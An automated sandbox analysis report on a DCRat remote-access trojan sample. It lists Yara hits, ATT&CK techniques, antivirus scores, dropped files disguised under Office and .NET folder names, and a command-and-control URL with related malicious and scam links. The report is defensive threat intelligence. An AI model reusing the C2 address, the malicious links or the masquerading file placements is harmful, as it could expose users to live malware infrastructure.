Source: Yara match	File source: 00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: o9jDrpZrgR.exe PID: 4308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BlockrefBrokerperf.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qBJICEqiLNwXNBLrN.exe PID: 6604, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
Source: Yara match	File source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED

Remote Access Functionality

Yara detected DCRat

Source: Yara match	File source: o9jDrpZrgR.exe, type: SAMPLE
Source: Yara match	File source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.o9jDrpZrgR.exe.657270c.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.BlockrefBrokerperf.exe.fc0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.2000894449.0000000004DA6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.2000527838.0000000006E2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.2180051762.0000000000FC2000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1999993579.0000000006524000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: o9jDrpZrgR.exe PID: 4308, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: BlockrefBrokerperf.exe PID: 5520, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: qBJICEqiLNwXNBLrN.exe PID: 6604, type: MEMORYSTR
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
Source: Yara match	File source: C:\reviewruntimeMonitor\BlockrefBrokerperf.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED
Source: Yara match	File source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, type: DROPPED

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	141 Windows Management Instrumentation	1 DLL Side-Loading	12 Process Injection	13 Masquerading	OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	361 Security Software Discovery	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	1 Non-Application Layer Protocol	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	11 Scripting	Logon Script (Windows)	Logon Script (Windows)	241 Virtualization/Sandbox Evasion	Security Account Manager	2 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	11 Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	1 Native API	Login Hook	Login Hook	12 Process Injection	NTDS	241 Virtualization/Sandbox Evasion	Distributed Component Object Model	Input Capture	Traffic Duplication	Protocol Impersonation			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	11 Deobfuscate/Decode Files or Information	LSA Secrets	1 Application Window Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Scripting	Cached Domain Credentials	1 Remote System Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	31 Obfuscated Files or Information	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Software Packing	Proc Filesystem	3 File and Directory Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 DLL Side-Loading	/etc/passwd and /etc/shadow	157 System Information Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
o9jDrpZrgR.exe	65%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
o9jDrpZrgR.exe	69%	Virustotal		Browse
o9jDrpZrgR.exe	100%	Avira	VBS/Runner.VPG
o9jDrpZrgR.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\Desktop\KWPomPtF.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\Desktop\BnwYCmoX.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\HJnNqbKj.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat	100%	Avira	BAT/Runner.IK
C:\Users\user\Desktop\MTqwIPIz.log	100%	Avira	HEUR/AGEN.1300079
C:\Users\user\Desktop\qtmQsFEO.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	100%	Avira	HEUR/AGEN.1309961
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	100%	Avira	HEUR/AGEN.1309961
C:\Users\user\Desktop\pwLIWFpU.log	100%	Avira	HEUR/AGEN.1300079
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\fNssmckm.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\jTkAEhsC.log	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	100%	Joe Sandbox ML
C:\Users\user\Desktop\GbOXfjDL.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\GVjFENOl.log	100%	Joe Sandbox ML
C:\Users\user\Desktop\lGVRPIpa.log	100%	Joe Sandbox ML
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	100%	Joe Sandbox ML
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.Dcrat
C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe	69%	Virustotal		Browse
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.Dcrat
C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe	69%	Virustotal		Browse
C:\Recovery\qBJICEqiLNwXNBLrN.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.Dcrat
C:\Recovery\qBJICEqiLNwXNBLrN.exe	69%	Virustotal		Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.Dcrat
C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe	69%	Virustotal		Browse
C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.Dcrat
C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe	69%	Virustotal		Browse
C:\Users\user\Desktop\BfMGYDNR.log	3%	ReversingLabs
C:\Users\user\Desktop\BfMGYDNR.log	4%	Virustotal		Browse
C:\Users\user\Desktop\BhRGcQzx.log	5%	ReversingLabs
C:\Users\user\Desktop\BhRGcQzx.log	9%	Virustotal		Browse
C:\Users\user\Desktop\BnwYCmoX.log	8%	ReversingLabs
C:\Users\user\Desktop\BnwYCmoX.log	13%	Virustotal		Browse
C:\Users\user\Desktop\ESwXjeKp.log	5%	ReversingLabs
C:\Users\user\Desktop\ESwXjeKp.log	4%	Virustotal		Browse
C:\Users\user\Desktop\GVjFENOl.log	5%	ReversingLabs
C:\Users\user\Desktop\GVjFENOl.log	7%	Virustotal		Browse
C:\Users\user\Desktop\GbOXfjDL.log	5%	ReversingLabs
C:\Users\user\Desktop\GbOXfjDL.log	7%	Virustotal		Browse
C:\Users\user\Desktop\HJnNqbKj.log	34%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\HJnNqbKj.log	33%	Virustotal		Browse
C:\Users\user\Desktop\KWPomPtF.log	34%	ReversingLabs	ByteCode-MSIL.Trojan.Generic
C:\Users\user\Desktop\KWPomPtF.log	33%	Virustotal		Browse
C:\Users\user\Desktop\MTqwIPIz.log	5%	ReversingLabs
C:\Users\user\Desktop\MTqwIPIz.log	4%	Virustotal		Browse
C:\Users\user\Desktop\NBQmTGPX.log	3%	ReversingLabs
C:\Users\user\Desktop\NBQmTGPX.log	4%	Virustotal		Browse
C:\Users\user\Desktop\QJNvoZJT.log	3%	ReversingLabs
C:\Users\user\Desktop\QJNvoZJT.log	4%	Virustotal		Browse
C:\Users\user\Desktop\SoilvDeL.log	17%	ReversingLabs
C:\Users\user\Desktop\SoilvDeL.log	9%	Virustotal		Browse
C:\Users\user\Desktop\XieCzWia.log	5%	ReversingLabs
C:\Users\user\Desktop\XieCzWia.log	4%	Virustotal		Browse

Source	Detection	Scanner	Label	Link
http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php	0%	Avira URL Cloud	safe
http://77.91.1H	0%	Avira URL Cloud	safe
http://77.91.124.101	0%	Avira URL Cloud	safe
http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr	0%	Avira URL Cloud	safe
http://77.91.124.101	1%	Virustotal		Browse
http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php	0%	Virustotal		Browse
http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr	1%	Virustotal		Browse

Name	Malicious	Antivirus Detection	Reputation
http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr	qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://77.91.1H	qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://77.91.124.101	qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	BlockrefBrokerperf.exe, 00000005.00000002.2209540037.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
77.91.124.101	unknown	Russian Federation		64419	ECOTEL-ASRU	true

General Information

Joe Sandbox Version:	38.0.0 Ammolite
Analysis ID:	1345582
Start date and time:	2023-11-21 04:46:04 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 23s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	15
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample file name:	o9jDrpZrgR.exe renamed because original name is a hash value
Original Sample Name:	c256204deb01c77e21ba17b5e2411245.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@18/43@0/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:47:25	API Interceptor	773171x Sleep call for process: qBJICEqiLNwXNBLrN.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ECOTEL-ASRU	yyoCffXuAe.exe	Get hash	malicious	DanaBot, RedLine	Browse	77.91.124.149
	https://www.google.com/url?q=http%3A%2F%2Fe-stata.ru%2Ftrack%2F3%2Fsource%2Fcampaign-ads%2F%23fyubmg&sa=D&sntz=1&usg=AOvVaw39clRPZwVf2QrSL7oQz10Y	Get hash	malicious	GRQ Scam	Browse	77.91.124.119
	http://payoutninja-2102318.haighhouse.com/on?930	Get hash	malicious	GRQ Scam	Browse	77.91.124.119
	https://get-bitcoin-pro.com/	Get hash	malicious	Unknown	Browse	77.91.124.119
	https://telegra.ph/To-go-to-the-site-follow-the-personal-link-in-the-description-5ns636269-11-01	Get hash	malicious	GRQ Scam	Browse	77.91.124.119
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.124.154
	http://url6724.benefity.sodexo.cz/ls/click?upn=QUhkirpB2TftQx8ZqYfR-2B-2F9b4b10DgDKa9hu1GeKwPVEh7d16IedBzYTffXpEBwERJ115yo-2FbYaFzr-2Fk8kG7CqeAFMoC9-2FWya374fNcODga5kLATGmidRFDcLx0mY8lYX-2FsUpUV71fivljHxcp5hyrg10CivKkrEwWTkJu6fyyk-3DtJBe_XJwWT5SpCU-2FA9typ-2F76-2FKVTtVvwzo6vvOS4M1YJtZYM5BLWusGGW-2BF7rV-2BFDmod7khpmfPZQq-2BtpRe1PzAdI1uNKNhLQ81dPCzL4HfHG8u177lUVhQ4O4nG9ktQpsA5yCPf7DQaYR0p5iuR3HRC5EuSIYPRyvEnCIhKT7OrSnIEInq4fhjLOnR1Oqz-2FEkF3ySrQgqgjXeW7sIvxBe05yOQ-3D-3D	Get hash	malicious	GRQ Scam	Browse	77.91.124.119
	WEXTRACT.EXE.exe	Get hash	malicious	Mystic Stealer, RedLine	Browse	77.91.124.86
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	77.91.124.154
	AXccSFenHt.exe	Get hash	malicious	RedLine	Browse	77.91.124.55
	hx8q0a4Hkn.exe	Get hash	malicious	RedLine	Browse	77.91.124.86
	2cdiEkh0Sx.exe	Get hash	malicious	RedLine	Browse	77.91.124.86
	1TMleppij0.exe	Get hash	malicious	RedLine	Browse	77.91.124.82
	file64b.exe	Get hash	malicious	RedLine	Browse	77.91.124.86
	boostfps.exe	Get hash	malicious	RedLine	Browse	77.91.124.86
	Epaulement.exe	Get hash	malicious	RedLine	Browse	77.91.124.86
	70141CDE965558529B1ADC82862D402149F21443F12F0.exe	Get hash	malicious	Amadey, Glupteba, Mystic Stealer, RedLine, SmokeLoader	Browse	77.91.124.86
	6eiKgvOR9U.exe	Get hash	malicious	Amadey, Glupteba, Mystic Stealer, RedLine, SmokeLoader	Browse	77.91.124.86
	O3l8L3C1HI.exe	Get hash	malicious	Amadey, Mystic Stealer, RedLine, SmokeLoader	Browse	77.91.124.1
	LeO8ZInM75.exe	Get hash	malicious	Amadey, Mystic Stealer, RedLine, SmokeLoader	Browse	77.91.124.1

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\Desktop\BfMGYDNR.log	LabyMod.exe	Get hash	malicious	DCRat, zgRAT	Browse
	jWPW3CjSsa.exe	Get hash	malicious	DCRat, zgRAT	Browse
	6v2t5igkn8.exe	Get hash	malicious	DCRat, zgRAT	Browse
	file.exe	Get hash	malicious	DCRat	Browse
	68ebff4655ce8e3641602b31a0f12adcd4f5d0813604655a309fd881.exe	Get hash	malicious	DCRat	Browse
	Sentares_Hack_#U2014_#U043a#U043e#U043f#U0438#U044f.exe	Get hash	malicious	DCRat	Browse
	LYOTMT26Vl.exe	Get hash	malicious	DCRat	Browse
	4J576dHwVU.exe	Get hash	malicious	DCRat	Browse
	sw9ofrTPS0.exe	Get hash	malicious	DCRat	Browse
	jHednJXHgj.exe	Get hash	malicious	DCRat	Browse
	file.exe	Get hash	malicious	DCRat	Browse
	file.exe	Get hash	malicious	DCRat	Browse

Created / dropped Files

C:\Program Files (x86)\Microsoft.NET\RedistList\088424020bedd6

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	ASCII text, with very long lines (881), with no line terminators
Category:	dropped
Size (bytes):	881
Entropy (8bit):	5.900735913753077
Encrypted:	false
SSDEEP:	24:1Y3GTX7pFBlH/ymgRYcqN4mYuRQK2abdfWuGyIsNNCqQO:gYX7pzx/ymbcA4mYu2gVIiNjQO
MD5:	4F233A8A5363F76698236D8D400523EA
SHA1:	20459ED2838E9837554FFDDDF55E5D32566BBCA1
SHA-256:	D43404ABB9FD6937DA29D4D857D8433364F51785C95F4CF885C9591FFEADB756
SHA-512:	9469301FCF4BDC6D9B5A6808E83A9C45D6AD930C8D47925A5FBC5189FBE427B0E5E0F0381B66DB7370E54E6DB24086B684BD42CE238CEF0917FC23CF91EC3AD8
Malicious:	false
Reputation:	low
Preview:	M8VqEqmuFb78Z0sr5JrazVql0OMvFtdtub9bCzBHaneIBrcShe5O2tD0St0ze1oV7NO80QoFIjAM1hkJw3NkyP1AYIJT9Mnj8IKxcdbRzzGSt08uJqCkoEhsVOkrGVG55aNtXwqTb6u9IiQhKYKSKC44kcbN3tKetLXSnOXWAsIsTijx8ChsLyu2gTI4UcZrvQQ7L745AxSb4MkC2oP0MbS5aewTFdBhTa6DRmlBIlrXfT8TsGCqNjfT7VhrKkzhwuIdQhuQCOrku5ZHfdk9aVTu5mF6E40iwKlvKfCLVvn914jC5ZLqA0GbbYhnbxLIXJykTo6AaZoprU2BDDAosKi5DJTw7ZthkemrF9sRdLPkLbtHfgjXxgaNl2gJUKDBpGFMsL5EVsLg47tlaMRazVuDEYFMci7TIO5FWgYTlfCEV3ToI4tH2mLTWBITGslxv2YpCoP3x7yTTqsKFaDiyzafDltUYFN24PScfomeozU5x1ApT7OpoD85b2mb55fsu5ZDXPpbyj39ffrLkDBa1hO0RWBnCLjtUmK2b7SDRx1FK9a6Ka013E1NrjwAOCZnAJp3Uztnv7IDpIqR6EdlUszPv7K2KRzPYOFBUhlUrNF66xhj2eEJjxSSTZIXp0cdH2pbDp7ZdI4Gm3S7akApNqqk5xr4YOo0vlzDHFgNhopa3MpaHK7E0xQaMFgP7DAPdDVADP0UEwIiAQqtHRxOQkA8VY0CjQPeoa600pW1Um9Dora6YxIqPv83DXopYxvyhn4kT02c454nk6Tn84owIiO2cDwdArcg1LfAxzmh4qwT1USGDBqdJ9q9ZBIQDYbMdXwZbS0ISG1cv4BHuqZ9A8X2eglwrVdgOj0di3pvLhLCHONeA

C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1300992
Entropy (8bit):	5.0586566573608085
Encrypted:	false
SSDEEP:	24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
MD5:	295BF8D9B734730EFA567C8DA9918FE1
SHA1:	09AABC018DA124BD0EBE8E1043860015AC71AA34
SHA-256:	7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
SHA-512:	C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 69%, Browse
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................

C:\Program Files\Microsoft Office 15\ClientX64\9bce06a9fec5b2

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	ASCII text, with very long lines (819), with no line terminators
Category:	dropped
Size (bytes):	819
Entropy (8bit):	5.889288515938023
Encrypted:	false
SSDEEP:	12:MTMEng4c8lklC6j5qLCumELxLYwwCcbuUTwjmCT1ERlcIxP1AUzmKA0Qm6L2n:MTMEnnRilCFmuswrcbNEXSxOq0k
MD5:	0E2911B74AD30D7652057A3D560EFDF7
SHA1:	C7BF5BCED785DF074368FD3ED6BB7DE4223690BD
SHA-256:	2E33E968A2F0DE4FC38500DBCDD4747AF4E667C833FDB95F1F530FF0756B5A9E
SHA-512:	1BBB04D5845818B0A7448287F6AF93A22CA12E23F4D7677F47DEF30B8776354B7E65FA55DF799D8026AE572431A9813103BD254189A0F24C25103B44AF5427B1
Malicious:	false
Reputation:	low
Preview:	H2mzUNXYzm6RL6AS9OcNZhOPOGTQits79tVsuCZCGlp4pbuabuCDyuYjoXkO3HzG39SckRh7yaHy2TkwV3zxqpIOUvEXbLJ8vjAqIS0JNFOYnkrUxy2ASCZO0DHyNKgnRICSS3oDDpklaultEtjmSIqtJwzFKB5DjlHeiYB3Kz7mbyyGbYuek3VIcSIgEi3BuhBzmHLprpcdLDSV7towQbcqP9CPQfzl5523w9dUMFw4a16YAxjU4GvSFVjnF6ZM01hQLYi7QTjLphPXCnOc6frzKjyaazPPqjEjUqNlOlEkgjnhGLlbr6QVJsGlkIhaEUfFdqDVZmOUaGSk6QUOOxhtTtZlkmBGEngMEiEZIPBFs54DafpUxTMQwvvtRbvxlHQxkFgYL5G8vcBXyVLE7rSvaPaSwUIqeOdkpGdU9RI2NOfTuY45Qq04zfWUpNl1xZeg9ass20FqiaiMuGiXZMaxYivKtIpvpQFxt8UTpMCZlJVY7KkipObk8qIapi8tKTBRVudwwOrMJAMONWNjiHGazeyCz4nHOTPRIDDMrxwbgOa8e3NTUZLDNkc05a62kj80v5FJTA2uUp4kE0i5rUwyILEilMRQ1406QjNjxD9Ugashp2vF1ALPxJsj0hhHtl3ay8Uen9InVcRrcg3taMY0tkJG1nsQf2l5gStqhQb22h4U1AGUoyqhMDrOzOn9Q1Hc1WLKxMLJug7LpyO0gXmrLEtcke1TnblBacdfy6hbnhwqFgiA9xd3OaQxnsjSU1gS46uNUsBk0LDoRDXE50Uz8swALq2FWOGwAevIvVpQv2CDWmf

C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe

Download File

Process:	C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1300992
Entropy (8bit):	5.0586566573608085
Encrypted:	false
SSDEEP:	24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
MD5:	295BF8D9B734730EFA567C8DA9918FE1
SHA1:	09AABC018DA124BD0EBE8E1043860015AC71AA34
SHA-256:	7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
SHA-512:	C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Author: Joe Security
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 79% Antivirus: Virustotal, Detection: 69%, Browse
Reputation:	low
